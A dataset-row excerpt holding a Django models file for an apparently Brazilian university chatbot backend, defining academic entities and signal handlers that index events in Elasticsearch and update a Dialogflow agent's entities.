print("Valor a pagar para cercar o terreno(R$): {:.2f}".format(valor))
|
983,799 | c9bd509c9dfafcb29209cdbaad184bef5a748bac | from django.db import models
from phonenumber_field.modelfields import PhoneNumberField
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
# custom imports
import datetime
from elasticsearch import Elasticsearch
from doug_server.ElasticConfig import ElasticConfig
import spacy
from spacy import displacy
from collections import Counter
import pt_core_news_sm
import dialogflow_v2
# os imports
import os
# Create your models here.
class Entidade(models.Model):
    """Abstract base: any entity identified by an optional name."""
    nome = models.CharField(max_length=30, blank= True, null= True)
    class Meta:
        abstract = True
class Pessoa(Entidade):
    """Abstract person with a mandatory name and unique e-mail address."""
    email = models.EmailField()
    nome = models.CharField(max_length= 30)
    class Meta:
        abstract = True
        # Fixed: ``unique_together: [...]`` was a bare annotation with no
        # runtime effect; it must be an assignment for Django to apply it.
        unique_together = ['email']
class Setor(Entidade):
    """Abstract organisational sector with a unique contact e-mail."""
    email = models.EmailField()
    class Meta:
        abstract = True
        # Fixed: was ``unique_together: [...]`` (annotation, no effect);
        # an assignment is required for Django to enforce uniqueness.
        unique_together = ['email']
class Documento(models.Model):
    """Abstract uploaded document with a public URL and uploading user."""
    titulo = models.CharField(max_length= 500, blank= True, null= True)
    data_upload = models.DateField()
    disponivel_em = models.URLField()
    user = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)
    class Meta():
        abstract = True
class Curso(Entidade):
    """A degree course; inherits only the name from Entidade."""
    pass
class Secretaria(Setor):
    """Course secretariat: one per course, with a contact phone."""
    telefone = PhoneNumberField()
    curso = models.OneToOneField(to=Curso, on_delete=None, related_name= 'secretaria', null=True)
class Secretario(Pessoa):
    """Secretary employed by a secretariat."""
    secretaria = models.ForeignKey(to=Secretaria, on_delete=None, related_name='secretario', null=True )
class Departamento(Setor):
    """Academic department attached to a course."""
    contato = PhoneNumberField()
    curso = models.ForeignKey(to= Curso, on_delete=None, related_name="departamento", null=True)
class Professor(Pessoa):
    """Teaching staff member, optionally heading a department."""
    lattes = models.URLField()
    departamento = models.ForeignKey(Departamento, related_name='corpo_docente', on_delete=models.CASCADE, null= True)
    is_chefe_departamento = models.OneToOneField(Departamento,related_name='chefe_departamento', on_delete=None, null= True)

    def __unicode__(self):
        """String form "name: email" (Python-2 protocol)."""
        return '%s: %s' % (self.nome, self.email)

    # Fixed: under Python 3 ``__unicode__`` is never invoked; alias it to
    # ``__str__`` so the readable form is used there as well.
    __str__ = __unicode__
class Disciplinas(Entidade):
    """Course offering taught by a single professor in a given semester."""
    carga_horaria = models.IntegerField()
    dia_da_semana = models.CharField(max_length= 300)
    # NOTE(review): choices=[(1,2)] defines a single choice (value 1 with
    # label 2); semesters 1 and 2 were probably intended — confirm.
    semestre = models.IntegerField(choices=[(1,2)])
    ano = models.IntegerField()
    professor_id = models.OneToOneField(Professor,on_delete=None)
class Tutores(Pessoa):
    """Tutor assigned to exactly one course offering."""
    telefone = PhoneNumberField(null=True)
    disciplina = models.OneToOneField(to=Disciplinas,on_delete=models.SET_NULL, null=True)
class Edital(Documento):
    """Official call/notice document with its storage path."""
    path = models.URLField()
    informacao_adicional = models.CharField(max_length=200)
class Boletim(models.Model):
    """Numbered bulletin issue grouping published news items."""
    data = models.DateField()
    numero = models.IntegerField(null= True, blank= True)
class Noticia(Documento):
    """News article, optionally attached to a bulletin issue."""
    corpo = models.TextField()
    boletim_fk = models.ForeignKey(on_delete= models.SET_NULL, to= Boletim, null= True)
class Evento(models.Model):
    """Calendar event; ``periodo`` (e.g. "01/2020") is derived on save."""
    assunto = models.TextField()
    data_criado = models.DateTimeField(editable= False)
    data_evento = models.DateTimeField()
    periodo = models.CharField(max_length= 7, null= True, blank= True)

    def save(self, *args, **kwargs):
        """Stamp creation time, derive the academic period, then save.

        NOTE(review): ``data_criado`` is refreshed on *every* save, not
        only on creation — confirm that is intended (otherwise prefer
        ``auto_now_add=True`` on the field).
        """
        self.data_criado = datetime.datetime.now()
        # Events before August fall in the first semester of their year.
        semestre = '01/' if self.data_evento.month < 8 else '02/'
        self.periodo = semestre + str(self.data_evento.year)
        # Fixed: the old code bound save()'s None result to a local named
        # ``object``, shadowing the builtin; just delegate.
        super(Evento, self).save(*args, **kwargs)
'''
@receivers
'''
# Mirror every saved Evento into Elasticsearch.
@receiver(post_save, sender=Evento, dispatch_uid="evento criado")
def insertEventoElasticSearch(sender, instance, created, **kwargs):
    """Index the saved Evento into the configured Elasticsearch index."""
    es_config = ElasticConfig()
    es = Elasticsearch(hosts=es_config.hosts)
    # Document body mirrors the model fields one-to-one.
    newInstance = {
        'assunto': instance.assunto,
        'data_criado': instance.data_criado,
        'data_evento': instance.data_evento,
        'periodo': instance.periodo
    }
    # Uses the model pk as the document id so re-saves overwrite in place.
    res = es.index(index=es_config.getEventoIndex(), doc_type='evento', id= instance.id, body= newInstance)
    print(res)
@receiver(post_save, sender= Evento)
def updateEventoKeyWordEntities(sender, instance, created, **kwargs):
    """Push keywords from the event subject to Dialogflow and retrain.

    Tokenises ``instance.assunto`` with the Portuguese spaCy model,
    registers each non-stop-word lemma as an entity entry, submits the
    batch update and triggers agent training.
    """
    assunto = instance.assunto
    # Load the Portuguese NLP model and tokenise the subject text.
    nlp = pt_core_news_sm.load()
    doc = nlp(assunto)
    tokens = pre_processing(doc)
    # Fetch the project's Dialogflow entity types.
    # Fixed: the original issued this request twice in a row and kept an
    # unused ``entries`` list; a single call suffices.
    client = dialogflow_v2.EntityTypesClient()
    parent = client.project_agent_path(os.environ['PROJECT_ID'])
    list_entity_types_response = list(client.list_entity_types(parent))
    # NOTE(review): index 2 hard-codes which entity type receives the
    # keywords — confirm the ordering is stable in this project.
    entity_type = list_entity_types_response[2]
    entities = list(entity_type.entities)
    for token in tokens:
        entities.append({'value': token.lemma_, 'synonyms': [token.text]})
    # Submit the updated entity list and wait for the operation to finish.
    response = client.batch_update_entities(entity_type.name, entities)
    response.done()
    # Retrain the Dialogflow agent so the new entities take effect.
    client = dialogflow_v2.AgentsClient()
    project_parent = client.project_path(os.environ['PROJECT_ID'])
    client.train_agent(project_parent)
def pre_processing(doc):
    """Return the tokens of *doc* that are not stop words, in order."""
    return [tok for tok in doc if not tok.is_stop]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.